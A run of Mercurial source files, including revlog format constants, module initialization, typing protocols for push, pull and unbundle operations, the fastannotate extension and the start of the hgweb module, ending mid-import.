MatcherMatchFuncT = matcher.MatchFuncT
MatcherT = matcher.MatcherT
MatcherTraverseDirFuncT = matcher.TraverseDirFuncT

PathT = misc.IPath

OutboundRevisionT = repository.IOutboundRevision
InboundRevisionT = repository.IInboundRevision
PushOpT = exchange.IPushOperation
PullOpT = exchange.IPullOperation
UnbundleOpT = exchange.IUnbundleOperation

StatusT = status.Status
SubrepoT = misc.ISubRepo
TransactionT = transaction.ITransaction

UnbundlePartT = bundle.IUnbundlePart

WorkingCommitContextT = context.IWorkingCommitContext
WorkingContextT = context.IWorkingContext


ExtSetupFnT = Callable[[UiT], None]
"""The signature of ``extsetup()``, typically used by extensions."""

RepoSetupFnT = Callable[[UiT, RepoT], None]
"""The signature of ``reposetup()``, typically used by extensions."""

UiPopulateFnT = Callable[[UiT], None]
"""The signature of ``uipopulate()``, typically used by extensions."""

UiSetupFnT = Callable[[UiT], None]
"""The signature of ``uisetup()``, typically used by extensions."""



# revlogdeltas.py - constant used for revlog logic.
#
# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com>
# Copyright 2018 Octobus <contact@octobus.net>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
"""Helper class to compute deltas stored inside revlogs"""

from __future__ import annotations

import enum
import struct
import typing

from typing import (
    Callable,
    TypedDict,
)

from ..interfaces import (
    repository,
    revlog as revlog_t,
)
from .. import revlogutils

### Internal utily constants


class Kind(enum.IntEnum):
    # we picked number over 256 to not be comparable with a bytes
    CHANGELOG = 1001
    MANIFESTLOG = 1002
    FILELOG = 1003
    OTHER = 1004


# Keep previous name for compatibility
KIND_CHANGELOG: Kind = Kind.CHANGELOG
KIND_MANIFESTLOG: Kind = Kind.MANIFESTLOG
KIND_FILELOG: Kind = Kind.FILELOG
KIND_OTHER: Kind = Kind.OTHER
ALL_KINDS: set[Kind] = set(Kind)
RevlogKindT = Kind

### Index entry key
#
#
#    Internal details
#    ----------------
#
#    A large part of the revlog logic deals with revisions' "index entries", tuple
#    objects that contains the same "items" whatever the revlog version.
#    Different versions will have different ways of storing these items (sometimes
#    not having them at all), but the tuple will always be the same. New fields
#    are usually added at the end to avoid breaking existing code that relies
#    on the existing order. The field are defined as follows:

#    [0] offset:
#            The byte index of the start of revision data chunk.
#            That value is shifted up by 16 bits. use "offset = field >> 16" to
#            retrieve it.
#
#        flags:
#            A flag field that carries special information or changes the behavior
#            of the revision. (see `REVIDX_*` constants for details)
#            The flag field only occupies the first 16 bits of this field,
#            use "flags = field & 0xFFFF" to retrieve the value.
ENTRY_DATA_OFFSET = 0

#    [1] compressed length:
#            The size, in bytes, of the chunk on disk
ENTRY_DATA_COMPRESSED_LENGTH = 1

#    [2] uncompressed length:
#            The size, in bytes, of the full revision once reconstructed.
ENTRY_DATA_UNCOMPRESSED_LENGTH = 2

#    [3] base rev:
#            Either the base of the revision delta chain (without general
#            delta), or the base of the delta (stored in the data chunk)
#            with general delta.
ENTRY_DELTA_BASE = 3

#    [4] link rev:
#            Changelog revision number of the changeset introducing this
#            revision.
ENTRY_LINK_REV = 4

#    [5] parent 1 rev:
#            Revision number of the first parent
ENTRY_PARENT_1 = 5

#    [6] parent 2 rev:
#            Revision number of the second parent
ENTRY_PARENT_2 = 6

#    [7] node id:
#            The node id of the current revision
ENTRY_NODE_ID = 7

#    [8] sidedata offset:
#            The byte index of the start of the revision's side-data chunk.
ENTRY_SIDEDATA_OFFSET = 8

#    [9] sidedata chunk length:
#            The size, in bytes, of the revision's side-data chunk.
ENTRY_SIDEDATA_COMPRESSED_LENGTH = 9

#    [10] data compression mode:
#            two bits that detail the way the data chunk is compressed on disk.
#            (see "COMP_MODE_*" constants for details). For revlog version 0 and
#            1 this will always be COMP_MODE_INLINE.
ENTRY_DATA_COMPRESSION_MODE = 10

#    [11] side-data compression mode:
#            two bits that detail the way the sidedata chunk is compressed on disk.
#            (see "COMP_MODE_*" constants for details)
ENTRY_SIDEDATA_COMPRESSION_MODE = 11

#    [12] Revision rank:
#            The number of revision under this one.
#
#            Formally this is defined as : rank(X) = len(ancestors(X) + X)
#
#            If rank == -1; then we do not have this information available.
#            Only `null` has a rank of 0.
ENTRY_RANK = 12

RANK_UNKNOWN = -1

### main revlog header

# We cannot rely on  Struct.format is inconsistent for python <=3.6 versus above
INDEX_HEADER_FMT = b">I"
INDEX_HEADER = struct.Struct(INDEX_HEADER_FMT)

## revlog version
REVLOGV0 = 0
REVLOGV1 = 1
# Dummy value until file format is finalized.
REVLOGV2 = 0xDEAD
# Dummy value until file format is finalized.
CHANGELOGV2 = 0xD34D

##  global revlog header flags
# Shared across v1 and v2.
FLAG_INLINE_DATA = 1 << 16
# Only used by v1, implied by v2.
FLAG_GENERALDELTA = 1 << 17

# This filelog use a flag to signal metadata presence in a file revision
FLAG_FILELOG_META = 1 << 18

# snapshot delta should be explicitly marked as such
FLAG_DELTA_INFO = 1 << 19

REVLOG_DEFAULT_FLAGS = FLAG_INLINE_DATA
REVLOG_DEFAULT_FORMAT = REVLOGV1
REVLOG_DEFAULT_VERSION = REVLOG_DEFAULT_FORMAT | REVLOG_DEFAULT_FLAGS
REVLOGV0_FLAGS = 0
REVLOGV1_FLAGS = (
    FLAG_INLINE_DATA | FLAG_GENERALDELTA | FLAG_FILELOG_META | FLAG_DELTA_INFO
)
REVLOGV2_FLAGS = FLAG_INLINE_DATA
CHANGELOGV2_FLAGS = 0

### individual entry

## index v0:
#  4 bytes: offset
#  4 bytes: compressed length
#  4 bytes: base rev
#  4 bytes: link rev
# 20 bytes: parent 1 nodeid
# 20 bytes: parent 2 nodeid
# 20 bytes: nodeid
INDEX_ENTRY_V0 = struct.Struct(b">4l20s20s20s")

## index v1
#  6 bytes: offset
#  2 bytes: flags
#  4 bytes: compressed length
#  4 bytes: uncompressed length
#  4 bytes: base rev
#  4 bytes: link rev
#  4 bytes: parent 1 rev
#  4 bytes: parent 2 rev
# 32 bytes: nodeid
INDEX_ENTRY_V1 = struct.Struct(b">Qiiiiii20s12x")
assert INDEX_ENTRY_V1.size == 32 * 2

#  6 bytes: offset
#  2 bytes: flags
#  4 bytes: compressed length
#  4 bytes: uncompressed length
#  4 bytes: base rev
#  4 bytes: link rev
#  4 bytes: parent 1 rev
#  4 bytes: parent 2 rev
# 32 bytes: nodeid
#  8 bytes: sidedata offset
#  4 bytes: sidedata compressed length
#  1 bytes: compression mode (2 lower bit are data_compression_mode)
#  19 bytes: Padding to align to 96 bytes (see RevlogV2Plan wiki page)
INDEX_ENTRY_V2 = struct.Struct(b">Qiiiiii20s12xQiB19x")
assert INDEX_ENTRY_V2.size == 32 * 3, INDEX_ENTRY_V2.size

#  6 bytes: offset
#  2 bytes: flags
#  4 bytes: compressed length
#  4 bytes: uncompressed length
#  4 bytes: parent 1 rev
#  4 bytes: parent 2 rev
# 32 bytes: nodeid
#  8 bytes: sidedata offset
#  4 bytes: sidedata compressed length
#  1 bytes: compression mode (2 lower bit are data_compression_mode)
#  4 bytes: changeset rank (i.e. `len(::REV)`)
#  23 bytes: Padding to align to 96 bytes (see RevlogV2Plan wiki page)
INDEX_ENTRY_CL_V2 = struct.Struct(b">Qiiii20s12xQiBi23x")
assert INDEX_ENTRY_CL_V2.size == 32 * 3, INDEX_ENTRY_CL_V2.size
INDEX_ENTRY_V2_IDX_OFFSET = 0
INDEX_ENTRY_V2_IDX_COMPRESSED_LENGTH = 1
INDEX_ENTRY_V2_IDX_UNCOMPRESSED_LENGTH = 2
INDEX_ENTRY_V2_IDX_PARENT_1 = 3
INDEX_ENTRY_V2_IDX_PARENT_2 = 4
INDEX_ENTRY_V2_IDX_NODEID = 5
INDEX_ENTRY_V2_IDX_SIDEDATA_OFFSET = 6
INDEX_ENTRY_V2_IDX_SIDEDATA_COMPRESSED_LENGTH = 7
INDEX_ENTRY_V2_IDX_COMPRESSION_MODE = 8
INDEX_ENTRY_V2_IDX_RANK = 9

# revlog index flags

# For historical reasons, revlog's internal flags were exposed via the
# wire protocol and are even exposed in parts of the storage APIs.

# revision has censor metadata, must be verified
REVIDX_ISCENSORED = repository.REVISION_FLAG_CENSORED
# revision hash does not match data (narrowhg)
REVIDX_ELLIPSIS = repository.REVISION_FLAG_ELLIPSIS
# revision data is stored externally
REVIDX_EXTSTORED = repository.REVISION_FLAG_EXTSTORED
# changelog revision changes files in a way that could affect copy tracing.
REVIDX_HASCOPIESINFO = repository.REVISION_FLAG_HASCOPIESINFO

# filelog revision has metadata
REVIDX_HASMETA = repository.FILEREVISION_FLAG_HASMETA

# revision is stored as a snapshot-delta
REVIDX_DELTA_IS_SNAPSHOT = repository.REVISION_FLAG_DELTA_IS_SNAPSHOT

REVIDX_DELTA_QUALITY = repository.REVISION_FLAG_DELTA_HAS_QUALITY
REVIDX_DELTA_GOOD = repository.REVISION_FLAG_DELTA_IS_GOOD
REVIDX_DELTA_P1_SMALL = repository.REVISION_FLAG_DELTA_P1_IS_SMALL
REVIDX_DELTA_P2_SMALL = repository.REVISION_FLAG_DELTA_P2_IS_SMALL

REVIDX_DEFAULT_FLAGS = 0
# stable order in which flags need to be processed and their processors applied
REVIDX_FLAGS_ORDER = [
    REVIDX_ISCENSORED,
    REVIDX_ELLIPSIS,
    REVIDX_EXTSTORED,
    REVIDX_HASCOPIESINFO,
    REVIDX_HASMETA,
    REVIDX_DELTA_IS_SNAPSHOT,
    REVIDX_DELTA_QUALITY,
    REVIDX_DELTA_GOOD,
    REVIDX_DELTA_P1_SMALL,
    REVIDX_DELTA_P2_SMALL,
]

REVIDX_DELTA_INFO_FLAGS = (
    REVIDX_DELTA_IS_SNAPSHOT
    | REVIDX_DELTA_QUALITY
    | REVIDX_DELTA_GOOD
    | REVIDX_DELTA_P1_SMALL
    | REVIDX_DELTA_P2_SMALL
)

# the flags that doesn't alter the revision content
REVIDX_NEUTRAL_FLAGS = (
    REVIDX_HASCOPIESINFO | REVIDX_HASMETA | REVIDX_DELTA_INFO_FLAGS
)

# bitmark for flags that could cause rawdata content change
REVIDX_RAWTEXT_CHANGING_FLAGS = REVIDX_ISCENSORED | REVIDX_EXTSTORED

## chunk compression mode constants:
# These constants are used in revlog version >=2 to denote the compression used
# for a chunk.

# Chunk use no compression, the data stored on disk can be directly use as
# chunk value. Without any header information prefixed.
COMP_MODE_PLAIN = 0

# Chunk use the "default compression" for the revlog (usually defined in the
# revlog docket). A header is still used.
#
# XXX: keeping a header is probably not useful and we should probably drop it.
#
# XXX: The value of allow mixed type of compression in the revlog is unclear
#      and we should consider making PLAIN/DEFAULT the only available mode for
#      revlog v2, disallowing INLINE mode.
COMP_MODE_DEFAULT = 1

# Chunk use a compression mode stored "inline" at the start of the chunk
# itself.  This is the mode always used for revlog version "0" and "1"
COMP_MODE_INLINE = revlogutils.COMP_MODE_INLINE

SUPPORTED_FLAGS = {
    REVLOGV0: REVLOGV0_FLAGS,
    REVLOGV1: REVLOGV1_FLAGS,
    REVLOGV2: REVLOGV2_FLAGS,
    CHANGELOGV2: CHANGELOGV2_FLAGS,
}

_no = lambda flags: False
_yes = lambda flags: True


def _from_flag(flag):
    return lambda flags: bool(flags & flag)


if typing.TYPE_CHECKING:
    _FromFlagsFnc = Callable[[int], bool]

    class RevlogFeatures(TypedDict):
        inline: _FromFlagsFnc
        generaldelta: _FromFlagsFnc
        hasmeta_flag: _FromFlagsFnc
        sidedata: bool
        docket: bool
        delta_info: _FromFlagsFnc


FEATURES_BY_VERSION: dict[int, RevlogFeatures] = {
    REVLOGV0: {
        'inline': _no,
        'generaldelta': _no,
        'hasmeta_flag': _no,
        'delta_info': _no,
        'sidedata': False,
        'docket': False,
    },
    REVLOGV1: {
        'inline': _from_flag(FLAG_INLINE_DATA),
        'generaldelta': _from_flag(FLAG_GENERALDELTA),
        'hasmeta_flag': _from_flag(FLAG_FILELOG_META),
        'delta_info': _from_flag(FLAG_DELTA_INFO),
        'sidedata': False,
        'docket': False,
    },
    REVLOGV2: {
        # The point of inline-revlog is to reduce the number of files used in
        # the store. Using a docket defeat this purpose. So we needs other
        # means to reduce the number of files for revlogv2.
        'inline': _no,
        'generaldelta': _yes,
        'hasmeta_flag': _no,  # Should become yes at some point
        'delta_info': _no,  # XXX we should make that True at some point
        'sidedata': True,
        'docket': True,
    },
    CHANGELOGV2: {
        'inline': _no,
        # General delta is useless for changelog since we don't do any delta
        'generaldelta': _no,
        'hasmeta_flag': _no,  # Should become yes at some point
        'delta_info': _no,
        'sidedata': True,
        'docket': True,
    },
}


SPARSE_REVLOG_MAX_CHAIN_LENGTH = 1000

### What should be done with a cached delta and its base ?

DELTA_REUSE_NO = revlog_t.DeltaBaseReusePolicy.NO_DELTA

# Ignore the cache when considering candidates.
#
# The cached delta might be used, but the delta base will not be scheduled for
# usage earlier than in "normal" order.
DELTA_BASE_REUSE_NO = revlog_t.DeltaBaseReusePolicy.NO

# Prioritize trying the cached delta base
#
# The delta base will be tested for validy first. So that the cached deltas get
# used when possible.
DELTA_BASE_REUSE_TRY = revlog_t.DeltaBaseReusePolicy.TRY
DELTA_BASE_REUSE_FORCE = revlog_t.DeltaBaseReusePolicy.FORCE

FILELOG_HASMETA_UPGRADE = 1
FILELOG_HASMETA_DOWNGRADE = 2

# metadata marker in stored content
# (not strickly revlog related, but used most for revlog)
META_MARKER = b'\x01\n'
META_MARKER_SIZE = len(META_MARKER)



# initialization.py - modules initialization for Mercurial
#
# Copyright 2025 Pierre-Yves David <pierre-yves.david@octobus.net>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
"""Modules initialization for Mercurial

This module is in charge of making sure that all modules that are necessary for
the "initialization" of the mercurial module are properly imported and
initialized.

This module exists for two reasons:

  - First, to avoid circular module imports, Mercurial started to use a
    pattern where modules that need to register "items" (e.g. a new command)
    use small top-level "inert" modules with almost no imports in them (e.g.
    `mercurial.tables`) to store these items. Modules that need to use these
    items then do so through the small "inert" modules. That way even if two
    different subsystems need information about the other, they don't need to
    import deeply into each other, avoiding cycles.

    However this system means we can't rely on the user to explicitly import
    the module that defines the code it will need. So this module is in charge
    of making sure each module that does this kind of registration has been
    properly imported and initialized early on.

    If you add one such module, you need to add it to the current
    initialization module.

  - Second, because Mercurial uses a lazy import system by default, having a
    module importing another one is not enough to ensure its code has been run,
    so this module is also responsible to make sure these important modules have
    been actually imported. Do so and, for the sake of clarity, we use a
    convention of calling an `init()` function on these modules. That function
    does nothing in most cases, but calling it will trigger the import of the
    module.
"""

from __future__ import annotations

from . import (
    admin_commands,
    bundle2_part_handlers,
    commands,
    debugcommands,
    revset,
    revset_predicates,
    strip,
    subrepo,
    templatekw,
)

from .admin import (
    chainsaw as admin_chainsaw,
)
from .hgweb import (
    webcommands,
)


def init():
    """noop function that is called to make sure the module is loaded and has
    registered the necessary items."""


admin_chainsaw.init()
admin_commands.init()
commands.init()
debugcommands.init()
revset_predicates.init()
# register all other revset first because of the i18nfunctions business.
revset.init()
strip.init()
webcommands.init()
bundle2_part_handlers.init()
templatekw.init()
subrepo.init()



# mercurial/interfaces/exchange.py - typing protocol for exchange related object
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.

from __future__ import annotations

import abc
from typing import (
    Any,
    Collection,
    Iterator,
    Protocol,
)


from . import (
    _basetypes as i_base,
    context as i_ctx,
    misc as i_misc,
    repository as i_repo,
    transaction as i_tr,
)


class ITransactionManager(Protocol):
    """An object to manage the life cycle of a transaction

    It creates the transaction on demand and calls the appropriate hooks when
    closing the transaction."""

    @abc.abstractmethod
    def transaction(self) -> i_tr.ITransaction:
        """Return an open transaction object, constructing if necessary"""

    @abc.abstractmethod
    def close(self):
        """close transaction if created"""

    @abc.abstractmethod
    def release(self):
        """release transaction if created"""

    @abc.abstractmethod
    def __enter__(self) -> 'ITransactionManager':
        ...

    @abc.abstractmethod
    def __exit__(self, exc_type, exc_val, exc_tb) -> None:
        ...


class IPullOperation(Protocol):
    """A object that represent a single pull operation"""

    # This protocol is a stub, you can help by expanding it
    # (or shrinking if we blindly things that are too internal)

    repo: i_repo.IRepo
    """repo we pull into"""

    remote: i_repo.IPeer
    """repo we pull from"""

    remote_path: i_misc.IPath
    """path object used to build this remote

    XXX Ideally we would just fetch this from the `remote`
    """

    heads: Collection[i_base.RevnumT]
    """revision we try to pull (None is "all")"""

    explicitbookmarks: Collection[bytes]
    """bookmark pulled explicitly"""

    force: bool
    """do we force pull?"""

    streamclonerequested: bool
    """whether a streaming clone was requested"""

    trmanager: ITransactionManager
    """transaction manager"""

    common: set[i_base.NodeIdT] | None
    """set of common changeset between local and remote before pull"""

    rheads: set[i_base.NodeIdT]
    """set of pulled head"""

    fetch: set[i_base.NodeIdT]
    """list of missing changeset to fetch remotely"""

    remotebookmarks: dict[bytes, i_base.NodeIdT]
    """remote bookmarks data"""

    cgresult: int
    """result of changegroup pulling (used as return code by pull)"""

    stepsdone: set[bytes]
    """list of step already done"""

    clonebundleattempted: bool
    """Whether we attempted a clone from pre-generated bundles."""

    includepats: set[bytes]
    """Set of file patterns to include."""

    excludepats: set[bytes]
    """Set of file patterns to exclude."""

    depth: int | None
    """Number of ancestor changesets to pull from each pulled head."""

    canusebundle2: bool
    """can the bundle2 format be used"""

    remotebundle2caps: i_base.Capabilities


class IOutgoing(Protocol):
    """Represents the result of a findcommonoutgoing() call."""

    ancestorsof: list[i_base.NodeIdT]
    """a list of the nodes whose ancestors are included in the
    outgoing operation."""

    missing: list[i_base.NodeIdT]
    """list of those ancestors of ancestorsof that are present in
    local but not in remote."""

    common: set[i_base.RevnumT]
    """contains revs common between the local and the remote
    repository (at least all of those that are ancestors of ancestorsof)."""

    commonheads: list[i_base.RevnumT]
    """list of heads of `common`."""

    excluded: list[i_base.NodeIdT]
    """the list of missing changeset that shouldn't be sent remotely."""


class IRemotePhasesSummary(Protocol):
    """summarize phase information on the remote side"""

    publishing: bool
    public_heads: list[i_base.RevnumT]
    draft_heads: list[i_base.RevnumT]
    draft_roots: list[i_base.RevnumT]


class IPushOperation(Protocol):
    """A object that represent a single push operation"""

    # This protocol is a stub, you can help by expanding it
    # (or shrinking if we blindly things that are too internal)

    repo: i_repo.IRepo
    """repo we push from"""

    ui: i_base.UiT

    remote: i_repo.IPeer
    """repo we push to"""

    force: bool
    """force option provided"""

    revs: None | Collection[i_base.RevnumT]
    """revs to be pushed (None is "all")"""

    bookmarks: Collection[bytes]
    """bookmark explicitly pushed"""

    newbranch: bool
    """allow push of new branch"""

    stepsdone: set[bytes]
    """step already performed"""

    cgresult: int | None
    """Integer version of the changegroup push result

    - None means nothing to push
    - 0 means HTTP error
    - 1 means we pushed and remote head count is unchanged *or*
      we have outgoing changesets but refused to push
    - other values as described by addchangegroup()
    """

    bkresult: int | None
    """integer value for the bookmark push"""

    outgoing: IOutgoing
    """discover.outgoing object (contains common and outgoing data)"""

    remoteheads: Collection[i_base.NodeIdT] | None
    """all remote topological heads before the push"""

    pushbranchmap: dict[bytes, list[bytes]] | None
    """Details of the remote branch pre and post push

    mapping: {'branch': ([remoteheads],
                         [newheads],
                         [unsyncedheads],
                         [discardedheads])}
    - branch: the branch name
    - remoteheads: the list of remote heads known locally
                   None if the branch is new
    - newheads: the new remote heads (known locally) with outgoing pushed
    - unsyncedheads: the list of remote heads unknown locally.
    - discardedheads: the list of remote heads made obsolete by the push
    """

    incoming: bool | None
    """testable as a boolean indicating if any nodes are missing locally."""

    remotephases: IRemotePhasesSummary | None
    """summary of the remote phase situation"""

    outdatedphases: list[i_ctx.IChangeContext] | None
    """phases changes that must be pushed along side the changesets"""

    fallbackoutdatedphases: list[i_ctx.IChangeContext] | None

    """phases changes that must be pushed if changeset push fails"""

    outobsmarkers: Collection[
        tuple[
            bytes,
            tuple[bytes, ...],
            int,
            dict[bytes, bytes],
            tuple[float, int],
            tuple[bytes, ...] | None,
        ]
    ]
    """outgoing obsmarkers"""

    outbookmarks: list[tuple[bytes, bytes, bytes]]
    """outgoing bookmarks, list of (bm, oldnode | '', newnode | '')"""

    trmanager: ITransactionManager | None
    """transaction manager"""

    pkfailcb: dict
    """ map { pushkey partid -> callback handling failure}
    used to handle exception from mandatory pushkey part failure
    """

    pushvars: dict[bytes, bytes] | None
    """an iterable of pushvars or None"""

    publish: bool
    """publish pushed changesets"""


class IBundlePart(Protocol):
    """A bundle2 part contains application level payload

    The part `type` is used to route the part to the application level
    handler.

    The part payload is contained in ``part.data``. It could be raw bytes or a
    generator of byte chunks.

    You can add parameters to the part using the ``addparam`` method.
    Parameters can be either mandatory (default) or advisory. Remote side
    should be able to safely ignore the advisory ones.

    Both data and parameters cannot be modified after the generation has begun.
    """

    id: bytes | None
    type: bytes
    mandatory: bool
    data: bytes
    mandatoryparams: dict[bytes, bytes]
    advisoryparams: dict[bytes, bytes]

    @abc.abstractmethod
    def copy(self) -> "IBundlePart":
        """return a copy of the part

        The new part have the very same content but no partid assigned yet.
        Parts with generated data cannot be copied."""

    @abc.abstractmethod
    def addparam(
        self,
        name: bytes,
        value: bytes = b'',
        mandatory: bool = True,
    ) -> None:
        """add a parameter to the part

        If 'mandatory' is set to True, the remote handler must claim support
        for this parameter or the unbundling will be aborted.

        The 'name' and 'value' cannot exceed 255 bytes each.
        """

    @abc.abstractmethod
    def getchunks(self, ui) -> Iterator[bytes]:
        """Yield bytes that containt the part header and payload"""
        ...


class IBundle20(Protocol):
    """represent an outgoing Bundle20 container

    Use the `addparam` method to add stream level parameter. and `newpart` to
    populate it. Then call `getchunks` to retrieve all the binary chunks of
    data that compose the bundle2 container."""

    capabilities: i_base.Capabilities
    prefercompressed: bool
    nbparts: int

    @abc.abstractmethod
    def setcompression(
        self,
        alg: bytes | None,
        compopts: dict | None = None,
    ) -> None:
        """setup core part compression to <alg>"""

    @abc.abstractmethod
    def addparam(self, name: bytes, value: None | bytes = None) -> None:
        """add a stream level parameter"""

    @abc.abstractmethod
    def addpart(self, part: IBundlePart) -> None:
        """add a new part to the bundle2 container

        Parts contains the actual applicative payload."""

    @abc.abstractmethod
    def newpart(self, typeid: bytes, *args, **kwargs) -> IBundlePart:
        """create a new part and add it to the containers

        As the part is directly added to the containers. For now, this means
        that any failure to properly initialize the part after calling
        ``newpart`` should result in a failure of the whole bundling process.

        You can still fall back to manually create and add if you need better
        control."""

    @abc.abstractmethod
    def getchunks(self) -> Iterator[bytes]:
        """yield the content of this bundle as bytes"""

    @abc.abstractmethod
    def salvageoutput(self) -> Collection[IBundlePart]:
        """return a list with a copy of all output parts in the bundle

        This is meant to be used during error handling to make sure we preserve
        server output"""


class IUnbundleRecords(Protocol):
    """keep record of what happens during and unbundle

    New records are added using `records.add('cat', obj)`. Where 'cat' is a
    category of record and obj is an arbitrary object.

    `records['cat']` will return all entries of this category 'cat'.

    Iterating on the object itself will yield `('category', obj)` tuples
    for all entries.

    All iterations happens in chronological order.
    """

    @abc.abstractmethod
    def add(
        self, category: bytes, entry: Any, inreplyto: int | None = None
    ) -> None:
        """add a new record of a given category.

        The entry can then be retrieved in the list returned by
        self['category']."""

    @abc.abstractmethod
    def getreplies(self, partid) -> "IUnbundleRecords":
        """get the records that are replies to a specific part"""

    @abc.abstractmethod
    def __getitem__(self, cat: bytes) -> Collection[Any]:
        """return all records in a given category"""

    @abc.abstractmethod
    def __iter__(self) -> tuple[bytes, Any]:
        """iter over every records a ('cat', obj)"""

    @abc.abstractmethod
    def __len__(self) -> int:
        """Number of records"""

    @abc.abstractmethod
    def __bool__(self) -> bool:
        """True if the records hold any information"""


class IUnbundleOperation(Protocol):
    """an object that represents the processing of a single

    Its purpose is to carry unbundle-related objects and states.

    A new object should be created at the beginning of each bundle processing.
    The object is to be returned by the processing function.

    The object has very little content now it will ultimately contain:
    * an access to the repo the bundle is applied to,
    * a ui object,
    * a way to retrieve a transaction to add changes to the repo,
    * a way to record the result of processing each part,
    * a way to construct a bundle response when applicable.
    """

    repo: i_repo.IRepo
    ui: i_base.UiT
    source = bytes
    records: IUnbundleRecords
    remote: i_repo.IPeer | None
    reply: IBundle20 | None
    captureoutput: bool
    modes: dict[int, int]

    @abc.abstractmethod
    def gettransaction(self) -> i_tr.ITransaction:
        """return an active transaction to unbundle into"""

    @abc.abstractmethod
    def addhookargs(self, hookargs: dict[bytes, bytes]):
        """add new hook args

        Can only be called before the transaction start.
        """



# Copyright 2016-present Facebook. All Rights Reserved.
#
# fastannotate: faster annotate implementation using linelog
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
"""yet another annotate implementation that might be faster (EXPERIMENTAL)

The fastannotate extension provides a 'fastannotate' command that makes
use of the linelog data structure as a cache layer and is expected to
be faster than the vanilla 'annotate' if the cache is present.

In most cases, fastannotate requires a setup that mainbranch is some pointer
that always moves forward, to be most efficient.

Using fastannotate together with linkrevcache would speed up building the
annotate cache greatly. Run "debugbuildlinkrevcache" before
"debugbuildannotatecache".

::

    [fastannotate]
    # specify the main branch head. the internal linelog will only contain
    # the linear (ignoring p2) "mainbranch". since linelog cannot move
    # backwards without a rebuild, this should be something that always moves
    # forward, usually it is "master" or "@".
    mainbranch = master

    # fastannotate supports different modes to expose its feature.
    # a list of combination:
    # - fastannotate: expose the feature via the "fastannotate" command which
    #   deals with everything in a most efficient way, and provides extra
    #   features like --deleted etc.
    # - fctx: replace fctx.annotate implementation. note:
    #     a. it is less efficient than the "fastannotate" command
    #     b. it will make it practically impossible to access the old (disk
    #        side-effect free) annotate implementation
    #     c. it implies "hgweb".
    # - hgweb: replace hgweb's annotate implementation. conflict with "fctx".
    # (default: fastannotate)
    modes = fastannotate

    # default format when no format flags are used (default: number)
    defaultformat = changeset, user, date

    # serve the annotate cache via wire protocol (default: False)
    # tip: the .hg/fastannotate directory is portable - can be rsynced
    server = True

    # build annotate cache on demand for every client request (default: True)
    # disabling it could make server response faster, useful when there is a
    # cronjob building the cache.
    serverbuildondemand = True

    # update local annotate cache from remote on demand
    client = False

    # path to use when connecting to the remote server (default: default)
    remotepath = default

    # minimal length of the history of a file required to fetch linelog from
    # the server. (default: 10)
    clientfetchthreshold = 10

    # for "fctx" mode, always follow renames regardless of command line option.
    # this is a BC with the original command but will reduced the space needed
    # for annotate cache, and is useful for client-server setup since the
    # server will only provide annotate cache with default options (i.e. with
    # follow). do not affect "fastannotate" mode. (default: True)
    forcefollow = True

    # for "fctx" mode, always treat file as text files, to skip the "isbinary"
    # check. this is consistent with the "fastannotate" command and could help
    # to avoid a file fetch if remotefilelog is used. (default: True)
    forcetext = True

    # use unfiltered repo for better performance.
    unfilteredrepo = True

    # sacrifice correctness in some corner cases for performance. it does not
    # affect the correctness of the annotate cache being built. the option
    # is experimental and may disappear in the future (default: False)
    perfhack = True
"""

# TODO from import:
# * `branch` is probably the wrong term, throughout the code.
#
# * replace the fastannotate `modes` configuration with a collection
#   of booleans.
#
# * Use the templater instead of bespoke formatting
#
# * rename the config knob for updating the local cache from a remote server
#
# * revise wireprotocol for sharing annotate files
#
# * figure out a sensible default for `mainbranch` (with the caveat
#   that we probably also want to figure out a better term than
#   `branch`, see above)
#
# * format changes to the revmap file (maybe use length-encoding
#   instead of null-terminated file paths at least?)

from __future__ import annotations

from mercurial.i18n import _
from mercurial import (
    error as hgerror,
    localrepo,
    registrar,
)

from . import (
    commands,
    protocol,
)

# Note for extension authors: ONLY specify testedwith = 'ships-with-hg-core' for
# extensions which SHIP WITH MERCURIAL. Non-mainline extensions should
# be specifying the version(s) of Mercurial they are tested with, or
# leave the attribute unspecified.
testedwith = b'ships-with-hg-core'

cmdtable = commands.cmdtable

configtable = {}
configitem = registrar.configitem(configtable)

configitem(b'fastannotate', b'modes', default=[b'fastannotate'])
configitem(b'fastannotate', b'server', default=False)
configitem(b'fastannotate', b'client', default=False)
configitem(b'fastannotate', b'unfilteredrepo', default=True)
configitem(b'fastannotate', b'defaultformat', default=[b'number'])
configitem(b'fastannotate', b'perfhack', default=False)
configitem(b'fastannotate', b'mainbranch')
configitem(b'fastannotate', b'forcetext', default=True)
configitem(b'fastannotate', b'forcefollow', default=True)
configitem(b'fastannotate', b'clientfetchthreshold', default=10)
configitem(b'fastannotate', b'serverbuildondemand', default=True)
configitem(b'fastannotate', b'remotepath', default=b'default')


def uisetup(ui):
    modes = set(ui.configlist(b'fastannotate', b'modes'))
    if b'fctx' in modes:
        modes.discard(b'hgweb')
    for name in modes:
        if name == b'fastannotate':
            commands.registercommand()
        elif name == b'hgweb':
            from . import support

            support.replacehgwebannotate()
        elif name == b'fctx':
            from . import support

            support.replacefctxannotate()
            commands.wrapdefault()
        else:
            raise hgerror.Abort(_(b'fastannotate: invalid mode: %s') % name)

    if ui.configbool(b'fastannotate', b'server'):
        protocol.serveruisetup(ui)


def extsetup(ui):
    # fastannotate has its own locking, without depending on repo lock
    # TODO: avoid mutating this unless the specific repo has it enabled
    localrepo.localrepository._wlockfreeprefix.add(b'fastannotate/')


def reposetup(ui, repo):
    if ui.configbool(b'fastannotate', b'client'):
        protocol.clientreposetup(ui, repo)



# hgweb/hgweb_mod.py - Web interface for a repository.
#
# Copyright 21 May 2005 - (c) 2005 Jake Edge <jake@edge2.net>
# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.

from __future__ import annotations

import contextlib
import os

from ..interfaces.types import (
    RepoT,
)

from .common import (
    ErrorResponse,
    HTTP_BAD_REQUEST,
    cspvalues,
    permhooks,
    statusmessage,
)

from .. import (
    encoding,
    error,
    extensions,
    formatter,
    hg,
    hook,
    profiling,
    pycompat,
    registrar,
    repoview,
    templatefilters,
    templater,
    templateutil,
    ui as uimod,
    wireprotoserver,
)
from ..repo import (
    factory as repo_factory,
)
from . import (
    common,
    request as requestmod,
    webcommands,
    webutil,
